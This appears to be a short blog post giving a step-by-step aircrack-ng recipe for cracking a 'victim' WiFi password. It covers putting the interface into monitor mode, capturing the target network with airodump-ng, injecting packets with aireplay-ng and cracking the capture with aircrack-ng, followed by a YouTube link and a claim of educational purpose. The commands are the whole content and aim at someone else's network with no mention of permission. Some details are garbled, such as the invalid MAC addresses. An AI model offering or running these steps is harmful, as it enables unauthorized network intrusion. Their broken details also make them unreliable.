Aircrack-ng is one of the tools that kali has to crack wireless Step 1 : ifconfig wlan0 down Step 2 : iwconfig wlan0 mode managed Step 3 : ifconfig wlan0 up Step 4 : airmon-ng check wlan0 Step 5 : kill process or with trouble Step 6 : airmon-ng wlan0 Step 7 : airodump-ng wlan0 Step 8 : airodump-ng -c 6 -w SCAN_test --bssid(victim bssid) wlan0 Step 9 : aireplay-ng -1 0 -e (victim id name) -a CC:D1:S3:FE:GT:HH -h 00:cd:ca:45:df:gf wlan0 Step 10 : aireplay-ng -3 -b BSSID wlan0 Step 11 : aircrack-ng filename.cap Now password will be cracking After cracked we can see the password of victim wifi.. My Youtube channel video link : https://youtu.be/XjvtJTA5FHo =========Thanks to visit my page=============
We are trying to develop our peoples in Technical skills. Providing Technology based videos and teaching about educational purpose of Cyber Security, Ethical Hacking , Penetration Testing, Technology tips & tricks, How protect yourself, Providing safety tips and more.